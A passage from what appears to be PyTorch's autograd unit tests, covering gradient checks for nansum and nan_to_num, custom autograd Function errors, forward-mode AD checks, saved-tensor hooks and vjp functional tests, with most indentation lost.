gradgradcheck(lambda x: x.nansum((0, -1)), a)
# With keep-dim
gradcheck(lambda x: x.nansum((0, -1), True), a)
gradgradcheck(lambda x: x.nansum((0, -1), True), a)
def test_nansum_dtype(self):
inp = torch.randn(2, 2, 2, 2)
with torch.no_grad():
inp[inp < 0.2] = float('nan')
def test(inp, inp_dtype, out_dtype):
with torch.no_grad():
a = inp.to(inp_dtype)
a.requires_grad = True
b = torch.sum(a, dtype=out_dtype)
b.backward()
self.assertEqual(a.dtype, a.grad.dtype)
test(inp, torch.float, torch.double)
test(inp, torch.double, torch.float)
def test_nan_to_num(self):
a = torch.randn(3, 3, 3, 3, dtype=torch.double)
with torch.no_grad():
a[torch.rand_like(a) < 0.2] = float('nan')
a[torch.rand_like(a) < 0.2] = float('inf')
a[torch.rand_like(a) < 0.2] = -float('inf')
a.requires_grad = True
gradcheck(lambda x: x.nan_to_num(), a)
gradgradcheck(lambda x: x.nan_to_num(), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
def test_custom_function_error(self):
class BadFw(Function):
@staticmethod
def backward(ctx, foo):
return foo
class BadBw(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
class BadBw2(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
@staticmethod
def backward(ctx, foo):
return foo
@staticmethod
def vjp(ctx, foo):
return foo
class BadJvp(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
inp = torch.rand(1, requires_grad=True)
with self.assertRaisesRegex(NotImplementedError, "must implement the forward"):
BadFw.apply(inp)
with self.assertRaisesRegex(RuntimeError, "must implement either the backward"):
BadBw.apply(inp).sum().backward()
with self.assertRaisesRegex(RuntimeError, "Implementing both 'backward' and 'vjp'"):
BadBw2.apply(inp).sum().backward()
with self.assertRaisesRegex(RuntimeError, "must implement the jvp function"):
with fwAD.dual_level():
d = fwAD.make_dual(inp, torch.rand_like(inp))
res = BadJvp.apply(d)
def test_custom_function_forward_mode_view_checks(self):
flag_to_error = {
"ok": None,
"not_a_view": "jvp is not returning a view",
"not_a_view_of_inp": "jvp is not returning a view of the given",
"not_a_view_of_inp_base": "jvp is not returning a view of the same base",
}
class ViewFn(Function):
@staticmethod
def forward(ctx, foo, flag):
ctx.flag = flag
ctx.size = foo.size()
return foo.narrow(0, 0, 2)
@staticmethod
def vjp(ctx, gO):
gI = gO.new_zeros(ctx.size)
gI.narrow(0, 0, 2).copy_(gO)
return gI, None
@staticmethod
def jvp(ctx, gI, _):
res = gI.narrow(0, 0, 2)
if ctx.flag != "ok":
# Break the view in the gradients!
res = res.clone()
if ctx.flag in ["not_a_view_of_inp", "not_a_view_of_inp_base"]:
# Result should be a view, just of the wrong thing
res = res.view_as(res)
return res
inp = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
for flag, msg in flag_to_error.items():
def test_fn(inp):
if flag == "not_a_view_of_inp_base":
inp = inp.view_as(inp)
return ViewFn.apply(inp, flag)
if msg is None:
gradcheck(test_fn, inp, check_forward_ad=True)
else:
with self.assertRaisesRegex(RuntimeError, msg):
gradcheck(test_fn, inp, check_forward_ad=True)
def test_custom_function_forward_mode_inplace_checks(self):
class InplaceFn(Function):
@staticmethod
def forward(ctx, foo, flag):
ctx.mark_dirty(foo)
ctx.flag = flag
foo.mul_(2)
return foo
@staticmethod
def vjp(ctx, gO):
return 2 * gO, None
@staticmethod
def jvp(ctx, gI, _):
if ctx.flag:
# Don't do the change inplace
return 2 * gI
else:
gI.mul_(2)
return gI
inp = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
def test_fn(inp, flag):
inp = inp.clone()
return InplaceFn.apply(inp, flag)
gradcheck(test_fn, (inp, False), check_forward_ad=True)
with self.assertRaisesRegex(RuntimeError, "inplace custom Function is not modifying the forward mode gradients inplace"):
gradcheck(test_fn, (inp, True), check_forward_ad=True)
def test_custom_function_forward_mode_wrong_formula(self):
class UserFn(Function):
@staticmethod
def forward(ctx, foo, should_fail):
ctx.should_fail = should_fail
return foo * 2
@staticmethod
def vjp(ctx, gO):
return 2 * gO, None
@staticmethod
def jvp(ctx, gI, _):
if ctx.should_fail:
# Wrong gradient formula
return 3 * gI
else:
return 2 * gI
inp = torch.rand(10, dtype=torch.double, requires_grad=True)
gradcheck(UserFn.apply, (inp, False), check_forward_ad=True)
with self.assertRaisesRegex(RuntimeError, "Jacobian computed with forward mode mismatch for output 0"):
gradcheck(UserFn.apply, (inp, True), check_forward_ad=True)
def test_custom_function_local_inplace(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp, inplace):
view = inp.clone()[:3]
if inplace:
view += 2
return view
@staticmethod
def backward(ctx, grad):
return grad, None
base = torch.rand(10, requires_grad=True)
foo = MyFn.apply(base, False)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
foo = MyFn.apply(base, True)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
def test_integer_outputs(self):
inp = torch.rand(4, requires_grad=True)
out = inp.argmax()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argmin()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argsort()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.rand((), requires_grad=True)
out = torch.searchsorted(inp, val)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
bins = torch.linspace(0, 1.0, steps=100, requires_grad=True)
vals = torch.rand(5, 5, requires_grad=True)
out = torch.bucketize(vals, bins)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.empty(5).requires_grad_()
out = val.count_nonzero()
self.assertFalse(out.requires_grad)
def assert_only_first_requires_grad(res):
if not isinstance(res, tuple):
res = (res,)
self.assertTrue(res[0].requires_grad)
for out in res[1:]:
if out is not None:
self.assertFalse(out.requires_grad)
for sort in [True, False]:
for return_inverse in [True, False]:
for return_counts in [True, False]:
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
# Here we test the internal functions to make sure all of them are
# covered on top of the public API
res = torch._unique(inp, sorted=sort, return_inverse=return_inverse)
assert_only_first_requires_grad(res)
# This looks public but is actually manually deleted from the
# torch namespace in torch/functional.py
res = torch._VF.unique_dim(inp, dim=0, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
# We don't test `unique_dim_consecutive` here.
# It looks public but the python binding is actually manually disabled in
# tools/autograd/gen_python_functions.py
res = torch._unique2(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
def test_custom_function_cycle(self):
class MyFn(Function):
@staticmethod
def forward(ctx, x, metadata):
x = x.clone()
ctx.meta = metadata
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
self.assertEqual(x, 3.14)
self.assertEqual(ctx.meta["foo"], 3.14)
return gO * x, None
def get_refs(with_backward):
a = torch.tensor(3.14, requires_grad=True)
metadata = {}
out = MyFn.apply(a, metadata)
metadata["foo"] = out
if with_backward:
out.sum().backward()
self.assertEqual(a.grad, a)
return torch._C._WeakTensorRef(out)
with disable_gc():
ref = get_refs(False)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
# The backward clears the saved_variables but not the __dict__
with disable_gc():
ref = get_refs(True)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
def test_input_buffer_accum(self):
leaf = torch.rand(2, 2, requires_grad=True)
# An op that returns sparse gradients
ind = torch.tensor([[0, 0]], dtype=torch.long)
out2 = leaf.gather(0, ind, sparse_grad=True)
# An op that returns the gradients as-is
out1 = leaf.clone()
grad_out1_original = torch.rand_like(out1)
grad_out1 = grad_out1_original.clone()
grad_out2 = torch.rand_like(out2)
torch.autograd.backward((out1, out2), (grad_out1, grad_out2))
# Given gradients should not be modified inplace
self.assertEqual(grad_out1, grad_out1_original)
def test_no_unnecessary_unwrapping(self):
a = torch.randn(5, requires_grad=True)
a_orig = a.detach().clone()
b = a * a
c = a * b
d = torch.exp(a)
# a is leaf
self.assertIs(b.grad_fn._saved_self, a)
self.assertIs(b.grad_fn._saved_other, a)
self.assertIs(c.grad_fn._saved_self, a)
# b is not an output
self.assertIs(c.grad_fn._saved_other, b)
# d is an output
self.assertEqual(d.grad_fn._saved_result, d)
self.assertIsNot(d.grad_fn._saved_result, d)
c.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
c.grad_fn._saved_self
# a is left untouched
self.assertEqual(a, a_orig)
def test_saved_variable_version_counter(self):
a = torch.rand(2, requires_grad=True)
b = torch.exp(a)
b_unpacked = b.grad_fn._saved_result
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
with torch.no_grad():
b += 1
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
def test_saved_variable_packing_unpacking_saved_original_with_hooks(self):
# Tests that packing/unpacking a SavedVariable works correctly with user-defined hooks
# The saved_original / did_not_save_original distinction corresponds to the `save_original`
# attribute of `SavedVariable`.
def test(get_input, is_leaf):
a = get_input()
grad_fn = a.grad_fn
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x / 2)
self.assertEqual(a, y.grad_fn._saved_self)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
y.sum().backward()
else:
y.sum().backward()
self.assertEqual(2 * a, a.grad)
a = get_input()
grad_fn = a.grad_fn
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x)
self.assertEqual(2 * a, y.grad_fn._saved_self)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
y.sum().backward()
else:
y.sum().backward()
self.assertEqual(3 * a, a.grad)
# double backward
a = get_input()
grad_fn = a.grad_fn
y = a ** 3
y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
g.sum().backward()
else:
g.sum().backward()
self.assertEqual(6 * a, a.grad)
a = get_input()
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: 1)
with self.assertRaisesRegex(TypeError, "Output of saved tensor unpack_hook expected to be a Tensor"):
print(y.grad_fn._saved_self)
a = get_input()
y = a * a
with self.assertRaisesRegex(TypeError, "missing 1 required positional argument"):
y.grad_fn._raw_saved_self.register_hooks(lambda x, b: x, lambda x: x)
a = get_input()
y = a * a
with self.assertRaisesRegex(TypeError, "missing 1 required positional argument"):
y.grad_fn._raw_saved_self.register_hooks(lambda x, b: (x, b), lambda x: x)
def inplace_double(x):
x *= 2
return x
a = get_input()
t = a * a
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
t.grad_fn._raw_saved_self.register_hooks(inplace_double, lambda x: x / 2)
# leaf
test(lambda: torch.randn(5, requires_grad=True), True)
# not leaf, not output
test(lambda: (1 + torch.randn(5, requires_grad=True)), False)
def test_saved_variable_packing_unpacking_did_not_save_original_with_hooks(self):
# Tests that packing/unpacking a SavedVariable works correctly with user-defined hooks
# The saved_original / did_not_save_original distinction corresponds to the `save_original`
# attribute of `SavedVariable`.
a = torch.randn(5, requires_grad=True)
y = torch.exp(a)
y.grad_fn._raw_saved_result.register_hooks(lambda x: x, lambda x: x)
self.assertEqual(y, y.grad_fn._saved_result)
self.assertIs(y.grad_fn, y.grad_fn._saved_result.grad_fn)
y.sum().backward()
self.assertEqual(a.grad, y)
def test_saved_variable_packing_unpacking_saved_original_with_default_hooks(self):
# Tests that default hooks are properly registered, used and reset
# The saved_original / did_not_save_original distinction corresponds to the `save_original`
# attribute of `SavedVariable`.
# See also:
# - test_saved_variable_packing_unpacking_saved_original_with_hooks
def pack(x):
warnings.warn("pack")
return x
with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
a = torch.ones(5, requires_grad=True)
warnings.simplefilter('always')
with warnings.catch_warnings(record=True) as w:
y = a * a
# should raise two warnings from a being saved twice
self.assertEqual(len(w), 2)
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x / 2):
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(2 * a, y.grad_fn._saved_self)
self.assertEqual(2 * a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(4 * a, a.grad)
# Exited hooks correctly
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
def test_saved_variable_packing_unpacking_did_not_save_original_with_default_hooks(self):
# See also test_saved_variable_packing_unpacking_did_not_save_original_with_hooks
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = torch.exp(a)
self.assertEqual(y, y.grad_fn._saved_result)
y.sum().backward()
self.assertEqual(a.grad, y)
def test_setting_default_saved_variable_hooks_twice_should_fail(self):
with self.assertRaisesRegex(RuntimeError, "Setting default hooks but they have already been set. "):
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
pass
def test_pack_hook_with_inplace_modification_should_fail(self):
a = torch.randn(5, requires_grad=True)
def inc(x):
x += 1
return x
with torch.autograd.graph.saved_tensors_hooks(inc, lambda x: x):
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
y = torch.exp(a)
y = torch.exp(a)
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
y.grad_fn._raw_saved_result.register_hooks(inc, lambda x: x)
def test_saving_variable_to_disk(self):
with tempfile.TemporaryDirectory() as tmp_dir:
def pack(x):
name = os.path.join(tmp_dir, str(uuid.uuid4()))
torch.save(x, name)
return name
def unpack(name):
return torch.load(name)
with torch.autograd.graph.saved_tensors_hooks(pack, unpack):
a = torch.ones(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
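# The hook contract exercised above: pack receives each tensor as it is saved for
# backward and may return any object (here a file path); unpack receives that object
# back during backward and must return a tensor with the original values. The disk
# round-trip through torch.save/torch.load is just one instance of that contract.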
def test_default_saved_variable_hooks_double_backward(self):
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
self.assertEqual(6 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
# factor 2 because only a is saved once
self.assertEqual(6 * 2 * a, a.grad)
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
# factor 4 because pow_backward is grad * (exp * self.pow(exp - 1))
# so grad is saved and self (i.e. a) is saved
self.assertEqual(6 * 4 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
# combining the two above blocks: 2 * 4 = 8
# note that in that sense, a is saved twice
self.assertEqual(6 * 8 * a, a.grad)
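# One way to read the factors above: the pack hook doubles every tensor it saves, and
# the double-backward result picks up one factor of 2 per doubled saved tensor entering
# the gradient formula, giving 6 * 2**k * a for k = 1, 2 and 3 in the three hooked blocks.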
def test_graph_save_on_cpu(self):
def test(get_input, cuda, pin_memory):
with torch.autograd.graph.save_on_cpu(pin_memory):
a = get_input()
if cuda:
a.cuda()
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
self.assertEqual(a.dtype, y.grad_fn._saved_self.dtype)
self.assertEqual(a.layout, y.grad_fn._saved_self.layout)
if y.is_sparse:
y = y.to_dense()
y.sum().backward()
self.assertEqual(2 * a, a.grad)
for cuda in [False] + ([True] if torch.cuda.is_available() else []):
for pin_memory in [True, False]:
# FloatTensor
test(lambda: torch.randn(5, requires_grad=True), cuda, pin_memory)
# DoubleTensor
test(lambda: torch.randn(5, requires_grad=True, dtype=torch.double), cuda, pin_memory)
# Sparse tensor
x = torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.]), requires_grad=True)
test(lambda: x, cuda, pin_memory)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_graph_save_on_cpu_cuda(self):
def f(x):
a = x + 1
return a * a
# with grad
a = torch.ones(1, requires_grad=True, device="cuda")
y = f(a)
memory_with_grad = torch.cuda.memory_allocated()
del a
del y
# without grad
a = torch.ones(1, requires_grad=True, device="cuda")
with torch.no_grad():
y = f(a)
memory_without_grad = torch.cuda.memory_allocated()
self.assertGreater(memory_with_grad, memory_without_grad)
del a
del y
# with hooks
with torch.autograd.graph.save_on_cpu():
a = torch.ones(1, requires_grad=True, device="cuda")
y = f(a)
memory_with_hooks = torch.cuda.memory_allocated()
self.assertEqual(memory_with_hooks, memory_without_grad)
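# save_on_cpu is a specialization of the hooks above: saved tensors are copied to CPU
# (optionally pinned memory) at pack time and copied back to their original device at
# unpack time, which is why GPU memory with the hooks matches the no-grad baseline here.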
def index_perm_variable(shape, max_indices):
if not isinstance(shape, tuple):
shape = (shape,)
index = torch.randperm(max_indices).narrow(0, 0, reduce(mul, shape)).view(shape)
return index
def bernoulli_scalar():
return torch.tensor(0, dtype=torch.uint8).bernoulli_()
def gradgradcheck_method_precision_override(test_name):
# these are just empirical observations; we should improve them
gradgradcheck_precision_override = {
'test_norm': {'atol': 2e-2, 'rtol': 1e-2},
'test_norm_1_5': {'atol': 1.5e-2, 'rtol': 1e-2},
'test_norm_3': {'atol': 5e-2, 'rtol': 1e-2},
'test_dist': {'atol': 5e-2, 'rtol': 1e-2},
'test_dist_4': {'atol': 8e-2, 'rtol': 1e-2},
}
non_broadcasted_test_name = test_name.split("_broadcast")[0]
override = gradgradcheck_precision_override.get(non_broadcasted_test_name)
if override:
if 'broadcast_lhs' in test_name or 'broadcast_rhs' in test_name:
# errors accumulated across 1 dimension
override = {'atol': override['atol'] * S, 'rtol': override['atol'] * S}
elif 'broadcast_all' in test_name:
# errors accumulated across multiple dimensions
override = {'atol': override['atol'] * S * S, 'rtol': override['atol'] * S * S}
return override
def run_grad_and_gradgrad_checks(test_case, name, test_name, apply_method, output_variable,
input_variables, run_gradgradcheck=True, check_batched_grad=True,
check_forward_ad=False):
test_case.assertTrue(gradcheck(apply_method, input_variables, eps=1e-6, atol=PRECISION,
check_batched_grad=check_batched_grad, check_forward_ad=check_forward_ad))
gradgradcheck_precision_override = gradgradcheck_method_precision_override(test_name)
if gradgradcheck_precision_override is not None:
atol = gradgradcheck_precision_override['atol']
rtol = gradgradcheck_precision_override['rtol']
test_case.assertTrue(gradgradcheck(apply_method, input_variables, None, atol=atol, rtol=rtol,
gen_non_contig_grad_outputs=True,
check_batched_grad=check_batched_grad))
else:
test_case.assertTrue(gradgradcheck(apply_method, input_variables,
gen_non_contig_grad_outputs=True,
check_batched_grad=check_batched_grad))
def run_functional_checks(test_case, test_name, name, apply_fn, run_grad_checks,
f_args_variable, f_args_tensor, *, check_forward_ad=False):
output_variable = apply_fn(*f_args_variable)
if run_grad_checks:
run_grad_and_gradgrad_checks(test_case, name, test_name, apply_fn,
output_variable, f_args_variable, check_forward_ad=check_forward_ad)
self_variable = f_args_variable[0]
if isinstance(output_variable, torch.Tensor) and output_variable.requires_grad and self_variable is not None:
output_variable.backward(torch.randn_like(output_variable))
test_case.assertEqualTypeString(self_variable, self_variable.grad)
test_case.assertEqual(self_variable.size(), self_variable.grad.size())
class TestAutogradFunctional(TestCase):
def _assert_same_struct(self, res, base):
# base and res should be Tensors or tuple of Tensors with the same size
if isinstance(base, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(base.size(), res.size())
elif isinstance(base, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(base), len(res))
for el_base, el_res in zip(base, res):
self.assertTrue(isinstance(el_base, torch.Tensor))
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertEqual(el_base.size(), el_res.size())
else:
# Wrong base
raise RuntimeError("The base given to `_assert_same_struct` doesn't have"
" the right structure.")
def _assert_interleaved_struct(self, res, base1, base2):
# base1 and base2 can be Tensors or tuples of Tensors.
# If they are tuples, res should be a tuple as well.
# The indexing works as follows for base1, base2 being
# - tuple, tuple: res[i][j][k][l] = (base1[i][k], base2[j][l])
# - tuple, Tensor: res[i][k][l] = (base1[i][k], base2[l])
# - Tensor, tuple: res[i][j][l] = (base1[i], base2[j][l])
# - Tensor, Tensor: res[k][l] = (base1[k], base2[l])
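# Illustrative shapes: base1 of size (2, 3) and base2 of size (5,) give a res of size
# (2, 3, 5); if base1 is a tuple, res is a tuple of the same length whose i-th entry has
# size base1[i].size() + base2.size(), and similarly when base2 (or both) is a tuple.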
if isinstance(base1, torch.Tensor) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(res.size(), base1.size() + base2.size())
elif isinstance(base1, tuple) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base1, torch.Tensor))
self.assertEqual(el_res.size(), el_base1.size() + base2.size())
elif isinstance(base1, torch.Tensor) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base2))
for el_res, el_base2 in zip(res, base2):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_res.size(), base1.size() + el_base2.size())
elif isinstance(base1, tuple) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, tuple))
self.assertEqual(len(res), len(base2))
for el_el_res, el_base2 in zip(el_res, base2):
self.assertTrue(isinstance(el_el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_el_res.size(), el_base1.size() + el_base2.size())
else:
# Wrong bases
raise RuntimeError("The bases given to `_assert_interleaved_struct` don't have"
" the right structure.")
def test_vjp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.ones(3)
with self.assertRaisesRegex(TypeError, "The inputs given to vjp must be either a Tensor"):
res = autogradF.vjp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vjp must"):
res = autogradF.vjp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the user-provided function returns"):
res = autogradF.vjp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.vjp(foo, inp, (torch.ones_like(inp), torch.ones_like(inp)))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.vjp(foo, inp, v[:2])
res = autogradF.vjp(foo, inp, v)[1]
self._assert_same_struct(res, inp)
def test_vjp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vjp(foo, inp, v, strict=True)
res = autogradF.vjp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vjp(bar, inp, v, strict=True)
res = autogradF.vjp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_vjp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vjp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = torch.ones(2)
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def test_vjp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones([])
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vjp(reducer, inputs)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones(4)
res = autogradF.vjp(expander, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def test_vjp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
        gradcheck(lambda inp, v: autogradF.vjp(reducer, inp, v, create_graph=True), (inputs, v))
        gradgradcheck(lambda inp, v: autogradF.vjp(reducer, inp, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
